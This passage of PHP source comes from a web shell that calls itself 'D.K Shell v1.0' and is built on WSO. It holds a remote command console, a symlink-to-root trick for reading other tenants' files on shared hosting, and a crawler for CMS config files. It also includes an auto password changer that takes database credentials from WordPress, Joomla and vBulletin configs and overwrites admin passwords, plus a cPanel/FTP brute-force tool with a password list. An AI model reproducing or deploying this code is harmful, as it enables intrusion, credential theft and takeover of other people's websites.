	echo '<span>Copy (read file)</span><form onsubmit=\'g(null,null,"1",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Glob (list dir)</span><form onsubmit=\'g(null,null,"2",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Curl (read file)</span><form onsubmit=\'g(null,null,"3",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Ini_restore (read file)</span><form onsubmit=\'g(null,null,"4",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form>';
	if($temp)
		echo '<pre class="ml1" style="margin-top:5px" id="Output">'.htmlspecialchars($temp).'</pre>';
	echo '</div>';
	echo "<center><a href=/dkcgi/cgi.pl>cgi script 1</a><br />";
	echo "<a href=/dkcgi/dz.sa>cgi script 2</a><br /></center>";
	wsoFooter();
}

function actionConsole() {
	if(isset($_POST['ajax'])) {
		$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
		ob_start();
		echo "document.cf.cmd.value='';
";
		$temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("
$ ".$_POST['p1']."
".wsoEx($_POST['p1']),"

	\'"));
		if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match))	{
			if(@chdir($match[1])) {
				$GLOBALS['cwd'] = @getcwd();
				echo "document.mf.c.value='".$GLOBALS['cwd']."';";
			}
		}
		echo "document.cf.output.value+='".$temp."';";
		echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;";
		$temp = ob_get_clean();
		echo strlen($temp), "
", $temp;
		exit;
	}
	wsoHeader();
    echo "<script>
if(window.Event) window.captureEvents(Event.KEYDOWN);
var cmds = new Array('');
var cur = 0;
function kp(e) {
	var n = (window.Event) ? e.which : e.keyCode;
	if(n == 38) {
		cur--;
		if(cur>=0)
			document.cf.cmd.value = cmds[cur];
		else
			cur++;
	} else if(n == 40) {
		cur++;
		if(cur < cmds.length)
			document.cf.cmd.value = cmds[cur];
		else
			cur--;
	}
}
function add(cmd) {
	cmds.pop();
	cmds.push(cmd);
	cmds.push('');
	cur = cmds.length-1;
}
</script>";
	echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(document.cf.cmd.value==\'clear\'){document.cf.output.value=\'\';document.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value);}else{g(null,null,this.cmd.value);} return false;"><select name=alias>';
	foreach($GLOBALS['aliases'] as $n => $v) {
		if($v == '') {
			echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>';
			continue;
		}
		echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>';
	}
	if(empty($_POST['ajax'])&&!empty($_POST['p1']))
		$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
	echo '</select><input type=button onclick="add(document.cf.alias.value);if(document.cf.ajax.checked){a(null,null,document.cf.alias.value);}else{g(null,null,document.cf.alias.value);}" value=">>"> <input type=checkbox name=ajax value=1 '.(@$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX<br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>';
	if(!empty($_POST['p1'])) {
		echo htmlspecialchars("$ ".$_POST['p1']."
".wsoEx($_POST['p1']));
	}
	echo '</textarea><input type=text name=cmd style="border-top:0;width:100%;margin:0;" onkeydown="kp(event);">';
	echo '</form></div><script>document.cf.cmd.focus();</script>';
	wsoFooter();
}

function actionLogout() {
	unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
	die('bye!');
}

function actionSelfRemove() {

	if($_POST['p1'] == 'yes')
		if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__)))
			die('Shell has been removed');
		else
			echo 'unlink error!';
    if($_POST['p1'] != 'yes')
        wsoHeader();
	echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';
	wsoFooter();
}


function actionsymlink() {
wsoHeader();
$IIIIIIIIIIIl = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];



	
	@mkdir('dk',0777);
$IIIIIIIIIIl1  = "Options all 
 DirectoryIndex Sux.html 
 AddType text/plain .php 
 AddHandler server-parsed .php 
  AddType text/plain .html 
 AddHandler txt .html 
 Require None 
 Satisfy Any";
$IIIIIIIIII1I =@fopen ('dk/.htaccess','w');
@fwrite($IIIIIIIIII1I ,$IIIIIIIIIIl1);
@symlink('/','dk/root');
$IIIIIIIIIlIl = basename('_FILE_');
  
$file = @implode(@file("/etc/named.conf"));
$rile = @implode(@file("dk/root/etc/named.conf"));
if(!$file & !$rile){ echo("# can't ReaD -> [ /etc/named.conf ]<br></br>Try changing the shell chmod values to 0755..!!<br />Try copying the shell to the web directory..!!"); wsoFooter();}
if(!$file & $rile){$file = $rile;}
preg_match_all("#named/(.*?).db#",$file ,$r);

$domains = array_unique($r[1]);



echo "<table align=center border=1 width=59% cellpadding=5>
<tr><td>Count:</td><td>Domain</td><td>User</td><td>Symlink</td><td>crawl</td></tr>";
$redf=0;
foreach($domains as $domain){

$user = posix_getpwuid(@fileowner("/etc/valiases/".$domain));
$redf++;
echo "<tr><td>$redf</td><td>$domain</td><td>".$user['name']."</td><td><a href='dk/root/home/".$user['name']."/public_html' target='_blank'>$domain </a></td>";
//echo "<td><form onsubmit=\"g('crawl',null,null,this.k.value);return false;\"><input type=submit name=k value='>></tr>";
echo '<td><script>p1_=p2_=p3_="";</script><a href=# onclick="g(\'crawl\',null,null,null,\''.$domain.'\')">Crawl </a></td></tr>';
}

echo "</table>";
	
	wsoFooter();
}

function actionpasschanger() {

if(isset($_POST['p3']))
 {
 $domainn = $_POST['p3'];
$thelinks = explode("}", $domainn);
$thelink = $thelinks[0];
$isjoomla = $thelinks[1];
$domain2 = $thelinks[2];
wsoHeader();
if ($isjoomla == "wp")
{
$db = "define('DB_NAME', ";
$user = "define('DB_USER', "; 
$password = "define('DB_PASSWORD', ";
$thecontent = file_get_contents($thelink);
//
$extracted = strpos($thecontent, $db);
$extracted = substr($thecontent, $extracted, 50);
$extracted = explode("'", $extracted);
$db = $extracted[3];
//echo $db;
$extracted = strpos($thecontent, $user);
$extracted = substr($thecontent, $extracted, 50);
$extracted = explode("'", $extracted);
$user = $extracted[3];
//echo $user;
$extracted = strpos($thecontent, $password);
$extracted = substr($thecontent, $extracted, 50);
$extracted = explode("'", $extracted);
$password = $extracted[3];
//echo $password;


mysql_connect("localhost", $user, $password) or die(mysql_error());
echo "<br/><center>Connected to MySQL<br /><br />";
mysql_select_db($db) or die(mysql_error());
echo "Connected to Database<br/>";
$result = mysql_query("UPDATE wp_users SET user_pass='\$P\$BmYX817viHAgyI7PxtgRZ7vOXmQU3M1' WHERE user_login='admin'"); 
$result1 = mysql_query("UPDATE wp_users SET user_pass='\$P\$BmYX817viHAgyI7PxtgRZ7vOXmQU3M1' WHERE ID='1'");
$result2 = mysql_query("UPDATE wp_users SET user_pass='\$P\$BmYX817viHAgyI7PxtgRZ7vOXmQU3M1' WHERE ID='2'");
$result3 = mysql_query("UPDATE wp_users SET user_pass='\$P\$BmYX817viHAgyI7PxtgRZ7vOXmQU3M1' WHERE ID='3'");


$result4 = mysql_query("UPDATE wp_users SET user_email='[email protected]' WHERE user_login='admin'");
$result5 = mysql_query("UPDATE wp_users SET  WHERE user_login='Admin'");

$result6 = mysql_query("UPDATE wp_users SET user_pass='\$P\$BmYX817viHAgyI7PxtgRZ7vOXmQU3M1' WHERE user_email='[email protected]'");

$query25 = mysql_query("SELECT * FROM wp_users WHERE user_pass='\$P\$BmYX817viHAgyI7PxtgRZ7vOXmQU3M1'");



$row25 = mysql_fetch_array( $query25 );

echo "<br/><br/>The Password is <b>root</b> for the usernames given below ::<br/><br/>";

echo "<b><a href=http://www.".$domain2.">".$row25['user_login']."</a></b>  <br/>";


}
elseif ($isjoomla == "jm")
{
$db = 'var $db =';
$user = 'var $user ='; 
$password = 'var $password =';
$thecontent = file_get_contents($thelink);
//
$extracted = strpos($thecontent, $db);
$extracted = substr($thecontent, $extracted, 50);
$extracted = explode("'", $extracted);
$db = $extracted[1];
//echo $db;
$extracted = strpos($thecontent, $user);
$extracted = substr($thecontent, $extracted, 50);
$extracted = explode("'", $extracted);
$user = $extracted[1];
//echo $user;
$extracted = strpos($thecontent, $password);
$extracted = substr($thecontent, $extracted, 50);
$extracted = explode("'", $extracted);
$password = $extracted[1];
//echo $password;
mysql_connect("localhost", $user, $password) or die(mysql_error());
echo "<br/><center>Connected to MySQL<br /><br />";
mysql_select_db($db) or die(mysql_error());
echo "Connected to Database<br/>";

// Insert a row of information into the table "example"
//mysql_query("INSERT INTO jos_users(name, username) VALUES('dkshell', 'dkshell' ) ") or die(mysql_error());
$result = mysql_query("UPDATE jos_users SET password='f0c337805362f5d3a6995004e3bbeb20:MnWvL1zEDGvLg8VlJ83Owjsl2SCtvSfF' WHERE gid='24'"); 
//$query24 = mysql_query("SELECT * FROM jos_users WHERE gid='24'");


$result = mysql_query("UPDATE jos_users SET password='f0c337805362f5d3a6995004e3bbeb20:MnWvL1zEDGvLg8VlJ83Owjsl2SCtvSfF' WHERE gid='25'");
//$query25 = mysql_query("SELECT * FROM jos_users WHERE gid='25'");

 
$result = mysql_query("UPDATE jos_users SET password='f0c337805362f5d3a6995004e3bbeb20:MnWvL1zEDGvLg8VlJ83Owjsl2SCtvSfF' WHERE gid='26'");
//$query26 = mysql_query("SELECT * FROM jos_users WHERE gid='26'");

$result = mysql_query("UPDATE jos_users SET password='f0c337805362f5d3a6995004e3bbeb20:MnWvL1zEDGvLg8VlJ83Owjsl2SCtvSfF' WHERE username='admin'"); 
$result = mysql_query("UPDATE jos_users SET email='[email protected]' WHERE username='admin'");
$result = mysql_query("UPDATE jos_users SET password='f0c337805362f5d3a6995004e3bbeb20:MnWvL1zEDGvLg8VlJ83Owjsl2SCtvSfF' WHERE username='Admin'");
//$result = mysql_query("UPDATE jos_users SET block='0' WHERE name='dkshell'") or die(mysql_error());
//$result = mysql_query("UPDATE jos_users SET usertype='Super Administrator' WHERE name='dkshell'") or die(mysql_error());
//$result = mysql_query("UPDATE jos_users SET sendEmail='1' WHERE name='dkshell'") or die(mysql_error());
//$result = mysql_query("UPDATE jos_users SET gid='25' WHERE name='dkshell'") or die(mysql_error());
//$result = mysql_query("UPDATE jos_users SET registerDate='2012-02-24 17:20:44' WHERE name='dkshell'") or die(mysql_error());
//$result = mysql_query("UPDATE jos_users SET lastvisitDate='0000-00-00 00:00:00' WHERE name='dkshell'") or die(mysql_error());
//$result = mysql_query("SELECT * FROM jos_users WHERE name='daryl'") or die(mysql_error());  

// get the first (and hopefully only) entry from the result

$query25 = mysql_query("SELECT * FROM jos_users WHERE password='f0c337805362f5d3a6995004e3bbeb20:MnWvL1zEDGvLg8VlJ83Owjsl2SCtvSfF'");
$row25 = mysql_fetch_array( $query25 );

echo "<br/><br/>The Password is <b>root</b> for the usernames given below ::<br/><br/>";
echo "<b><a href=http://www.".$domain2.">".$row25['username']."</b>  <br/></center>";

}
elseif ($isjoomla == "vb")
{
$db = "config['Database']['dbname'] = '";
$user = "config['MasterServer']['username'] = '"; 
$password = "config['MasterServer']['password'] = '";
$thecontent = file_get_contents($thelink);
//
$extracted = strpos($thecontent, $db);
$extracted = substr($thecontent, $extracted, 50);
$extracted = explode("'", $extracted);
$db = $extracted[5];
//echo $db;
$extracted = strpos($thecontent, $user);
$extracted = substr($thecontent, $extracted, 50);
$extracted = explode("'", $extracted);
$user = $extracted[5];
//echo $user;
$extracted = strpos($thecontent, $password);
$extracted = substr($thecontent, $extracted, 50);
$extracted = explode("'", $extracted);
$password = $extracted[5];
//echo $password;


mysql_connect("localhost", $user, $password) or die(mysql_error());
echo "<br/><center>Connected to MySQL<br /><br />";
mysql_select_db($db) or die(mysql_error());
echo "Connected to Database<br/>";


$result = mysql_query("UPDATE user SET password='32c07513a635525a9eca5389e9bb3203' WHERE usertitle='Administrator'");
$result = mysql_query("UPDATE user SET salt='<(@]M=wj4Ew/k`*f{o6sK!5:l5Z?xE' WHERE usertitle='Administrator'"); 
$result = mysql_query("UPDATE user SET email='[email protected]' WHERE usertitle='Administrator'");
$result = mysql_query("UPDATE user SET password='32c07513a635525a9eca5389e9bb3203' WHERE userid='1'");
$result = mysql_query("UPDATE user SET salt='<(@]M=wj4Ew/k`*f{o6sK!5:l5Z?xE' WHERE userid='1'");


$query25 = mysql_query("SELECT * FROM user WHERE password='32c07513a635525a9eca5389e9bb3203'");



$row25 = mysql_fetch_array( $query25 );

echo "<br/><br/>The Password is <b>McK7jjBq</b> for the usernames given below ::<br/><br/>";

echo "<b><a href=http://www.".$domain2.">".$row25['username']."</a></b>  <br/>";

}
else
{
} 
}

wsoFooter();





}

function actioncrawl() {
wsoHeader();
$IIIIIIIIIIIl = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
$IIIIIIIIIII1=explode('/',$IIIIIIIIIIIl );
$IIIIIIIIIIIl =str_replace($IIIIIIIIIII1[count($IIIIIIIIIII1)-1],'',$IIIIIIIIIIIl ); 
$isjoomla = "0";
 if(isset($_POST['p3']))
 {
 $domainn = $_POST['p3'];

 $userr = posix_getpwuid(@fileowner("/etc/valiases/".$domainn));

echo "<table align='center' width='40%' class='main' ><tr><td> Results: </td></tr>";

$IIIIIIIII1l1=$IIIIIIIIIIIl.'/dk/root/home/'.$userr['name'].'/public_html/wp-config.php';
$IIIIIIIII11I=get_headers($IIIIIIIII1l1);
$IIIIIIIII11l=$IIIIIIIII11I[0];
$IIIIIIIII111=$IIIIIIIIIIIl.'/dk/root/home/'.$userr['name'].'/public_html/blog/wp-config.php';
$IIIIIIIIlIII=get_headers($IIIIIIIII111);
$IIIIIIIIlIIl=$IIIIIIIIlIII[0];
$IIIIIIIIlII1=$IIIIIIIIIIIl.'/dk/root/home/'.$userr['name'].'/public_html/configuration.php';
$IIIIIIIIlIlI=get_headers($IIIIIIIIlII1);
$IIIIIIIIlIll=$IIIIIIIIlIlI[0];
$IIIIIIIIlIl1=$IIIIIIIIIIIl.'/dk/root/home/'.$userr['name'].'/public_html/joomla/configuration.php';
$IIIIIIIIlI1I=get_headers($IIIIIIIIlIl1);
$IIIIIIIIlI1l=$IIIIIIIIlI1I[0];
$IIIIIIIIlI11=$IIIIIIIIIIIl.'/dk/root/home/'.$userr['name'].'/public_html/includes/config.php';
$IIIIIIIIllII=get_headers($IIIIIIIIlI11);
$IIIIIIIIllIl=$IIIIIIIIllII[0];
$IIIIIIIIllI1=$IIIIIIIIIIIl.'/dk/root/home/'.$userr['name'].'/public_html/vb/includes/config.php';
$IIIIIIIIlllI=get_headers($IIIIIIIIllI1);
$IIIIIIIIllll=$IIIIIIIIlllI[0];
$IIIIIIIIlll1=$IIIIIIIIIIIl.'/dk/root/home/'.$userr['name'].'/public_html/forum/includes/config.php';
$IIIIIIIIll1I=get_headers($IIIIIIIIlll1);
$IIIIIIIIll1l=$IIIIIIIIll1I[0];
$IIIIIIIIll11=$IIIIIIIIIIIl.'/dk/root/home/'.$userr['name'].'public_html/clients/configuration.php';
$IIIIIIIIl1II=get_headers($IIIIIIIIll11);
$IIIIIIIIl1Il=$IIIIIIIIl1II[0];
$IIIIIIIIl1I1=$IIIIIIIIIIIl.'/dk/root/home/'.$userr['name'].'/public_html/support/configuration.php';
$IIIIIIIIl1II=get_headers($IIIIIIIIl1I1);
$IIIIIIIIl1lI=$IIIIIIIIl1II[0];
$IIIIIIIIl1ll=$IIIIIIIIIIIl.'/dk/root/home/'.$userr['name'].'/public_html/client/configuration.php';
$IIIIIIIIl1l1=get_headers($IIIIIIIIl1ll);
$IIIIIIIIl11I=$IIIIIIIIl1l1[0];
$IIIIIIIIl11l=$IIIIIIIIIIIl.'/dk/root/home/'.$userr['name'].'/public_html/submitticket.php';
$IIIIIIIIl111=get_headers($IIIIIIIIl11l);
$IIIIIIII1III=$IIIIIIIIl111[0];
$IIIIIIII1IIl=$IIIIIIIIIIIl.'/dk/root/home/'.$userr['name'].'/public_html/client/configuration.php';
$IIIIIIII1II1=get_headers($IIIIIIII1IIl);
$IIIIIIII1IlI=$IIIIIIII1II1[0];
$IIIIIIII1Ill = strpos($IIIIIIIII11l,'200');
$IIIIIIII1I1I='&nbsp;';
if (strpos($IIIIIIIII11l,'200') == true )
{
$IIIIIIII1I1I="<td><a href='".$IIIIIIIII1l1."' target='_blank'>".$domainn." [Wordpress]</a></td>";
$isjoomla = "wp";
$thelink = $IIIIIIIII1l1;
$domain2 = $domainn . '/wp-login.php';
}
elseif (strpos($IIIIIIIIlIIl,'200') == true)
{
$IIIIIIII1I1I="<td><a href='".$IIIIIIIII111."' target='_blank'>".$domainn." [Wordpress]</a></td>";
$isjoomla = "wp";
$thelink = $IIIIIIIII111;
$domain2 = $domainn . '/blog/wp-login.php';
}
elseif (strpos($IIIIIIIIlIll,'200')  == true and strpos($IIIIIIII1III,'200')  == true )
{
$IIIIIIII1I1I="<td> <a href='".$IIIIIIIIl11l."' target='_blank'>".$domainn." [WHMCS]</a></td>";
}
elseif (strpos($IIIIIIIIl1lI,'200')  == true)
{
$IIIIIIII1I1I ="<td> <a href='".$IIIIIIIIl1I1."' target='_blank'>".$domainn." [WHMCS]</a></td>";
}
elseif (strpos($IIIIIIIIl11I,'200')  == true)
{
$IIIIIIII1I1I =" <td><a href='".$IIIIIIIIl1ll."' target='_blank'>".$domainn." [WHMCS]</a></td>";
}
elseif (strpos($IIIIIIIIlIll,'200')  == true)
{
$IIIIIIII1I1I="<td> <a href='".$IIIIIIIIlII1."' target='_blank'>".$domainn." [Joomla]</a></td>";
$isjoomla = "jm";
$thelink = $IIIIIIIIlII1;
$domain2 = $domainn . '/administrator/';
}
elseif (strpos($IIIIIIIIlI1l,'200')  == true)
{
$IIIIIIII1I1I="<td> <a href='".$IIIIIIIIlIl1."' target='_blank'>".$domainn." [Joomla]</a></td>";
$isjoomla = "jm";
$thelink = $IIIIIIIIlIl1;
$domain2 = $domainn . '/joomla/administrator/';
}
elseif (strpos($IIIIIIIIllIl,'200')  == true)
{
$IIIIIIII1I1I="<td> <a href='".$IIIIIIIIlI11."' target='_blank'>".$domainn." [vBulletin]</a></td>";
$isjoomla = "vb";
$thelink = $IIIIIIIIlI11;
$domain2 = $domainn;
}
elseif (strpos($IIIIIIIIllll,'200')  == true)
{
$IIIIIIII1I1I="<td> <a href='".$IIIIIIIIllI1."' target='_blank'>".$domainn." [vBulletin]</a></td>";
$isjoomla = "vb";
$thelink = $IIIIIIIIllI1;
$domain2 = $domainn;
}
elseif (strpos($IIIIIIIIll1l,'200')  == true)
{
$IIIIIIII1I1I="<td> <a href='".$IIIIIIIIlll1."' target='_blank'>".$domainn." [vBulletin]</a></td>";
$isjoomla = "vb";
$thelink = $IIIIIIIIlll1;
$domain2 = $domainn;
}
else
{
//continue;
$IIIIIIII1I1l = $userr ;
$IIIIIIII1I1I='<tr><td><a href=/dk/root/home/'.$userr['name'].'/public_html/>'.$domainn.'[Custom Website]</a></td><td></td></tr>';
}
echo $IIIIIIII1I1I;
}

echo "</center></table><br></br><br><br>";  
$saying = $thelink . '}' . $isjoomla . '}' . $domain2;
if ($isjoomla == "wp" || $isjoomla == "vb" || $isjoomla == "jm")
{
 echo '<center><h3><b><script>p1_=p2_=p3_="";</script><a href=# onclick="g(\'passchanger\',null,null,null,\''.$saying.'\')"> [Change Password] </a></b></center></h3>';   
}

wsoFooter();
}

function actionabout() {
wsoHeader();
echo '<div class=header>  ';

    echo "<pre>

	
	                                      D.K Shell v1.0
										  
	  
	                       D.K Shell (c)oded by b47chguru & Lnx Root for ICF
	
          D.K shell is made on the same architecture of WSO shell. D.K shell is a professional web shell..
	  It has all the features to bust the security..including disabling mod_security , disabling php safe mode,
	  Symlink,webcrawler, auto-admin password changer for vbulletin,joomla,Wordpress...etc,
	  perl cgi scipt compatibility and a better backconnection script.For any doubts or queries on D.K shell
	  mail me at [email protected]
       Note:The security on the webserver is completely disabled when clicked on the 'safemode' link and the default port for php backconnection is 70
	  
		Special Thanks to Archith Kp who helped generously throughout the project..!!
				
				
				
				
	 </pre></div>";
wsoFooter();
}
function actionBruteforce() {
	wsoHeader();
	
	
	

$file = fopen($dir."dkcpanel.php" ,"w+");
$sa=base64_decode('<?php
$cpanel_port="2082";
$connect_timeout=5;
set_time_limit(0);
$submit=$_REQUEST['submit'];
$users=$_REQUEST['users'];
$pass=$_REQUEST['passwords'];
$target=$_REQUEST['target'];
$cracktype=$_REQUEST['cracktype'];
if($target == ""){
$target = "localhost";
}
$charset=$_REQUEST['charset'];
if($charset=="")
 $charset="lowercase";
$max_length=$_REQUEST['max_length'];
if($max_length=="")
 $max_length=10;
$min_length=$_REQUEST['min_length'];
if($min_length=="")
 $min_length=1;

 $charsetall = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9");
 $charsetlower = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z");
 $charsetupper = array("A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z");
 $charsetnumeric = array("0", "1", "2", "3", "4", "5", "6", "7", "8", "9");
 $charsetlowernumeric = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9");
 $charsetuppernumeric = array("A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9");
 $charsetletters = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z" );
 $charsetsymbols= array("!", "@", "#", "$", "%", "^", "&", "*", "(", ")","_" );
 $charsetlowersymbols = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z","!", "@", "#", "$", "%", "^", "&", "*", "(", ")","_" );
 $charsetuppersymbols = array("A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z","!", "@", "#", "$", "%", "^", "&", "*", "(", ")","_" );
 $charsetletterssymbols = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z","!", "@", "#", "$", "%", "^", "&", "*", "(", ")","_" );
 $charsetnumericsymbols = array("0", "1", "2", "3", "4", "5", "6", "7", "8", "9","!", "@", "#", "$", "%", "^", "&", "*", "(", ")","_" );
 $charsetlowernumericsymbols = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9","!", "@", "#", "$", "%", "^", "&", "*", "(", ")","_" );
 $charsetuppernumericsymbols = array("A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9","!", "@", "#", "$", "%", "^", "&", "*", "(", ")","_" );
 $charsetletterssymbols = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z" ,"!", "@", "#", "$", "%", "^", "&", "*", "(", ")","_" );
 $charsetlettersnumericsymbols=array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z" ,"!", "@", "#", "$", "%", "^", "&", "*", "(", ")","_","0", "1", "2", "3", "4", "5", "6", "7", "8", "9" );
    if ($charset == "all")
        $vals = $charsetall;
    elseif ($charset == "lowercase") 
        $vals = $charsetlower;
     elseif ($charset == "uppercase") 
        $vals = $charsetupper;
     elseif ($charset == "numeric") 
        $vals = $charsetnumeric;
     elseif ($charset == "lowernumeric") 
        $vals = $charsetlowernumeric;
     elseif ($charset == "uppernumeric") 
        $vals = $charsetuppernumeric;
    elseif ($charset == "letters") 
        $vals = $charsetletters;
    elseif ($charset == "symbols") 
        $vals = $charsetsymbols;
    elseif ($charset == "lowersymbols") 
        $vals = $charsetlowersymbols;
    elseif ($charset == "uppersymbols") 
        $vals = $charsetuppersymbols;
    elseif ($charset == "letterssymbols") 
        $vals = $charsetletterssymbols;
    elseif ($charset == "numberssymbols") 
        $vals = $charsetnumericsymbols;
    elseif ($charset == "lowernumericsymbols") 
        $vals = $charsetlowernumericsymbols;
    elseif ($charset == "uppernumericsymbols") 
        $vals = $charsetuppernumericsymbols;
    elseif ($charset == "lettersnumericsymbols") 
        $vals = $charsetlettersnumericsymbols;
    else echo "INVALID CHARSET";
?>
<html>
<head>
<meta http-equiv="Content-Language" content="en-us">
</head>
<title>Cpanel , FTP CraCkeR</title>
<body text="#00FF00" bgcolor="#000000" vlink="#008000" link="#008000" alink="#008000">
<div align="center">
<form method="POST" style="border: 1px solid #000000">
        <table border="1" width="67%" bordercolorlight="#008000" bordercolordark="#003700">
                <tr>
                        <td>
        <p align="center"><b><font color="#008000" face="Tahoma" size="2">
                <span lang="en-us">IP server</span> :</font><font face="Arial">
        </font><font face="Arial" color="#CC0000">
        <input type="text" name="target" size="16" value="<?php echo $target ?>" style="border: 2px solid #1D1D1D; background-color: #000000; color:#008000; font-family:Verdana; font-weight:bold; font-size:13px"></font></b></p>
        <p align="center"><b><font color="#008000" face="Tahoma" size="2">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </font></b></p>
                        <div align="center">
                                <table border="1" width="57%" bordercolorlight="#008000" bordercolordark="#003700">
                                        <tr>
                                                <td align="center">
                                                                                                <span lang="en-us"><font color="#FF0000"><b>User List</b></font></span></td>
                                                <td>
                                                <p align="center">
                                                                                                <span lang="en-us"><font color="#FF0000"><b>Password List</b></font></span></td>
                                        </tr>
                                </table>

                        <p align="center">&nbsp;<textarea rows="20" name="users" cols="25" style="border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0"><?php system('ls /var/mail'); ?>
</textarea><textarea rows="20" name="passwords" cols="25" style="border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0"><?php print "123123\n123456\n1234567\n12345678\n123456789\n159159\n112233\n332211\n1478963\n1478963.\ncpanel\npassword\nuser\npasswd\npasswords\n159357\n357951\n114477\npass\nPassword\n!@#123!@#\n123321\npass123\nqwerty\nabcdef\nabcd1234\nqwertyuiop\n123123\n121212\n111111\n102030"; ?></textarea><br>
        <br>
                                <font style="font-weight:700" size="2" face="Tahoma" color="#008000">
                                                <span lang="ar-sa">Guess options</span></font><font style="font-size: 12pt;" size="-3" face="Verdana"><span style="font-size: 9pt;">&nbsp;
                                                <font face="Tahoma">
                                                <input name="cracktype" value="cpanel" style="font-weight: 700;" checked type="radio"></font></span></font><b><font size="2" face="Tahoma">
                                                Cpanel</font><font size="2" color="#cc0000" face="Tahoma">
                                                </font><font size="2" color="#FFFFFF" face="Tahoma">
                                                (2082)</font></b><font size="2" face="Tahoma"><b> </b>
                                                </font>
                                                <font style="font-size: 12pt;" size="-3" face="Verdana">
                                                <span style="font-size: 9pt;"><font face="Tahoma">
                                                <input name="cracktype" value="cpanel2" style="font-weight: 700;" type="radio"></font></span></font><b><font size="2" face="Tahoma">
                                                Telnet</font><font size="2" color="#cc0000" face="Tahoma">
                                                </font><font size="2" color="#FFFFFF" face="Tahoma">
                                                (23)</font></b><font size="2" face="Tahoma"><b> </b>
                                                </font>
                                                <font style="font-size: 12pt;" size="-3" face="Verdana">
                                                <span style="font-size: 9pt;"><font face="Tahoma">
